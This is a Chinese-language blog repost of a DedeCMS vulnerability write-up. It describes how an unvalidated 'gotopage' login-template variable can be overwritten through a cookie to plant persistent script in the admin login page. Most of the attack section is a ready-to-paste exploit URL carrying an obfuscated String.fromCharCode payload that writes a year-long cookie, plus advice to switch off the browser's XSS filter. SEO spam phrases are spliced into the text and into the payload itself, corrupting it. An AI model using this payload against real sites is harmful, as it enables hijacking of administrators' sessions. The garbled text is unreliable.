DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY,DEDE技术
导读:DEDE技术DEDE技术影响版本: DEDECMS全版本 漏洞描叙: DEDECMS后台登陆模板中的gotopage变量未效验传入数据,导致XSS漏洞。 \dede\templets\免费织梦模板。
影响版本:DEDECMS全版本
漏洞描叙:DEDECMS后台登陆模板中的gotopage变量未效验传入数据,导致XSS漏洞。\dede\templets\login.htm 65行左右<input type="hidden" name="gotopage" value="<?php if(!empty($gotopage)) echo $gotopage;?>" />由于DEDECMS的全局变量注册机制,该变量内容可以被COOKIE变量覆盖,可以在客户端持久化存储,最终导致一个XSS ROOTKIT。
漏洞危害:管理员在触发DEDECMS任意的XSS漏洞(如留言本XSS)后,可以通过该漏洞永久劫持覆盖gotopage变量,在DEDECMS的后台登陆页面永久嵌入任意的恶意代码。
验证:1.复制粘贴下面的URL访问,触发XSS安装XSS ROdede模板下载OTKIT,注意IE8/9等会拦截URL类型的XSS漏洞,需关闭XSS筛选器梦织模板。http://v57.demo.dedecms.com/dede/login.php?gotopage="><script>eval(String.fromCharCode(80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,61,39,34,62,60,115,99,114,105,112,116,62,97,108,101,114,116,40,47,120,115,115,32,114,111,111,116,107,105,116,33,47,41,60,47,115,99,114,105,112,116,62,60,120,61,34,39,59,32,13,10,118,97,114,32,100,97,116,101,61,110,101,119,32,68,97,116,101,40,41,59,13,10,118,97,114,32,101,120,112,105,114,101,68,97,121,115,61,51,54,53,59,32,13,10,100,97,116,101,46,115,101,116,84,105,109,101,40,100,97,116,101,46,103,dede织梦模板101,116,84,105,109,101,40,41,43,101,120,112,105,114,101,68,97,121,115,42,50,52,42,51,54,48,48,42,49,48,48,48,41,59,13,10,100,111,99,117,109,101,110,116,46,99,111,111,107,105,101,61,39,103,111,116,111,112,97,103,101,61,39,43,80,101,114,115,105,115,116,101,110,99,101,95,100,97,116,97,43,39,59,101,120,112,105,114,101,115,61,39,43,100,97,116,101,46,116,111,71,77,84,83,116,114,105,110,103,40,41,59,13,10,97,108,101,114,116,40,39,88,115,115,32,82,111,111,116,107,105,116,32,73,110,115,116,97,108,108,32,83,117,99,99,101,115,115,102,117,108,32,33,33,33,33,39,41,59))</script><x="
2.关闭浏览器,无论怎么访问下面的任意URL,都会触发我们的XSS。http://v57.demo.dedecms.com/dede/login.php?gotopage=dasdasdasdahttp://v57.demo.dedecms.com/dede/login.php
相关免费织梦模板。声明: 本文由我的SEOUC技术文章主页发布于:2023-07-18 ,文章DEDECMS全版本gotopage变量XSS ROOTKIT 0DAY,DEDE技术主要讲述变量,版本,CMS网站建设源码以及服务器配置搭建相关技术文章。转载请保留链接: https://www.seouc.com/article/web_29794.html